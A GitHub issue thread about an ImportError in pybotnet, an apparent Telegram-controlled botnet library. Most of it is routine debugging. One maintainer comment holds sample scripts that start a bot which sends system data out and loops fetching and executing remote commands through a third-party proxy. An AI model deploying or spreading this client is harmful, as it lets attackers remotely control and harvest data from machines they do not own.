### ISSUE TITLE
ImportError

### ISSUE THREAD

**Issue by Ali-Imangholi** [onionj/pybotnet#26]
Hi, onionj.
When I imported pybotnet and ran the code I got this error.
ImportError: cannot import name 'util' from partially initialized module 'pybotnet' (most likely due to a circular import)
Would you help me, please?

**Comment by SepehrRasouli** [comment]
Did you install pybotnet with pip or Did you try to import from the pybotnet directory ? 
Could you elaborate a little bit more ?

**Comment by Ali-Imangholi** [comment]
Thanks for your responding.
For first time I used pip but it showed the error which I send it above and second time I used Pycharm and its package manager and again it showed the same error.

**Comment by SepehrRasouli** [comment]
Interesting. I never faced this problem before.
@onionj I think this should be labled as bug. We can consider doing changes
on the pybotnet folder to locally install pybotnet as a package to avoid
this bug.
@Ali-Imangholi Could you test these commands on your end?
```
from pybotnet import utils
from pybotnet import pybotnet
from pybotnet import scripts
```

**Comment by Ali-Imangholi** [comment]
Unfortunately, it did not work.

**Comment by SepehrRasouli** [comment]
Could you send the error please?

**Comment by Ali-Imangholi** [comment]
Traceback (most recent call last):
  File "xxxxxxxx", line 1, in <module>
    from pybotnet import utils
  File "xxxxxxxx\Python\Python39\lib\site-packages\pybotnet\__init__.py", line 1, in <module>
    from .pybotnet import PyBotNet
  File "xxxxxxxx\Python\Python39\lib\site-packages\pybotnet\pybotnet.py", line 2, in <module>
    from . import util
ImportError: cannot import name 'util' from partially initialized module 'pybotnet' (most likely due to a circular import) (xxxxxxxx\Python\Python39\lib\site-packages\pybotnet\__init__.py)

**Comment by onionj** [comment]
I checked the following code on Windows 10 and Debin 11 and they work properly

```python
from pybotnet import pybotnet
import time

TELEGRAM_TOKEN = '1468299547:ABHs_________MzZcYxF_e00000000000'
ADMIN_CHAT_ID = '12345678910'

bot = pybotnet.PyBotNet(TELEGRAM_TOKEN, ADMIN_CHAT_ID, show_log=True, send_system_data=True)

delay = 7

while True:
    print('*-*'*15)
    bot.get_and_execute_scripts_by_third_party_proxy()
    time.sleep(delay)
```

```python
from pybotnet import PyBotNet
import time

TELEGRAM_TOKEN = '1468299547:ABHs_________MzZcYxF_e00000000000'
ADMIN_CHAT_ID = '12345678910'

bot = PyBotNet(TELEGRAM_TOKEN, ADMIN_CHAT_ID, show_log=True, send_system_data=True)

delay = 7

while True:
    print('*-*'*15)
    bot.get_and_execute_scripts_by_third_party_proxy()
    time.sleep(delay)
```

If you send your code and operating system, maybe I can help

**Comment by Ali-Imangholi** [comment]
I just had copied your sample code and then it had  "circular import" error.
I use windows10.

**Comment by onionj** [comment]
The file name is also important

**Comment by Ali-Imangholi** [comment]
It is "bot.py"

**Comment by SepehrRasouli** [comment]
I can't recreate this error to fix it , i tried it on ubuntu vm and on my own machine and it worked correctly on both. 
Are you sure the problem is not from your side ? Can you run it on another machine to help us recreate it ?

**Comment by Ali-Imangholi** [comment]
Its became correct when I download it from GitHub.

**Comment by SepehrRasouli** [comment]
Interesting.
Are you sure your python is configured correctly ? Can you test it on another computer ?
Downloading pybotnet from github doesn't install it on your computer , so the problem might be from your side.
